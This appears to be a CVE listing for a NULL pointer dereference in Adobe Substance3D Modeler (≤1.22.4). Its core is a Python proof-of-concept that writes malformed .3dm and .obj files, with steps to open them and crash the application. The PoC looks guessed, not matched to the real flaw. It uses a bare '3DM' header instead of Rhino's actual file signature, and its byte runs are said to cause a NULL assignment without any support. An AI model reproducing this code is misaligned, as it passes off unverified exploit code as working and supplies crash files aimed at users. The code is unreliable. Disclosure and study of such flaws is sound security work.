Security Vulnerability Report
CVE-2026-21301 CVSS 5.5 MEDIUM

Published: 2026-01-13 21:15:54
Last Modified: 2026-01-14 17:58:10

Description

Substance3D - Modeler versions 1.22.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:* - VULNERABLE
Adobe Substance3D Modeler <= 1.22.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21301 PoC - Adobe Substance3D Modeler NULL Pointer Dereference
# This PoC creates a malicious 3D model file that triggers NULL pointer dereference
import struct
import os


def create_malicious_3dm_file(filename):
    """
    Create a malicious .3dm file that triggers NULL pointer dereference
    in Adobe Substance3D Modeler versions <= 1.22.4
    """
    # RHINO 3DM file header structure
    magic = b'3DM'  # 3DM file magic number
    version = b'1.0 '  # Version field

    # Create minimal 3DM file with malformed data
    # The key is to create a file with specific byte patterns
    # that cause the parser to set a pointer to NULL
    malformed_data = bytearray()

    # File header (256 bytes)
    header = bytearray(256)
    header[0:3] = magic
    header[3:7] = version

    # Write version 1 chunk with malformed data
    malformed_data += b'\x00' * 100  # Padding that causes NULL assignment
    malformed_data += b'\xFF\xFF\xFF\xFF'  # Invalid size field
    malformed_data += b'\x00' * 200  # More padding

    # Write chunk header that triggers vulnerability
    chunk_type = b'\x00\x00\x00\x01'  # Type field
    chunk_size = b'\xFF\xFF\xFF\xFF'  # Oversized size
    chunk_data = b'\x00' * 500  # Malformed chunk data

    # Combine all parts
    with open(filename, 'wb') as f:
        f.write(header)
        f.write(chunk_type)
        f.write(chunk_size)
        f.write(chunk_data)
        f.write(malformed_data)

    print(f'[+] Created malicious file: {filename}')
    print(f'[+] File size: {os.path.getsize(filename)} bytes')


def create_malicious_obj_file(filename):
    """
    Alternative PoC: Create malformed OBJ file
    OBJ format is simpler and widely supported
    """
    # Malformed OBJ file with invalid vertex/normal indices
    obj_content = '''# Malformed OBJ file for CVE-2026-21301
# This file triggers NULL pointer dereference in Modeler
v 1.0 2.0 3.0
v 4.0 5.0 6.0
v 7.0 8.0 9.0
vn 0.0 1.0 0.0
vn 1.0 0.0 0.0
# Face with invalid references (negative or out of bounds)
f -1//-1 -2//-2 -3//-3
f 999999//999999 888888//888888 777777//777777
# Additional malformed data
g
s off
l 999999 888888 777777
'''
    with open(filename, 'w') as f:
        f.write(obj_content)

    print(f'[+] Created malicious OBJ file: {filename}')


if __name__ == '__main__':
    print('=' * 60)
    print('CVE-2026-21301 PoC - Adobe Substance3D Modeler')
    print('NULL Pointer Dereference Vulnerability')
    print('=' * 60)

    # Create malicious files
    create_malicious_3dm_file('exploit_cve2026_21301.3dm')
    create_malicious_obj_file('exploit_cve2026_21301.obj')

    print('\n[!] Instructions:')
    print('1. Open the generated malicious file in Adobe Substance3D Modeler')
    print('2. The application should crash with access violation')
    print('3. This confirms the NULL pointer dereference vulnerability')
    print('=' * 60)

References

https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21301", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:53.793", "lastModified": "2026-01-14T17:58:10.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Modeler versions 1.22.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Las versiones 1.22.4 y anteriores de Substance3D - Modeler están afectadas por una vulnerabilidad de desreferencia de puntero nulo que podría conducir a una denegación de servicio de la aplicación. La explotación de este problema requiere interacción del usuario, ya que la víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.22.5", "matchCriteriaId": "D5A6870D-D2DE-4B8F-8680-3717CA179D14"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}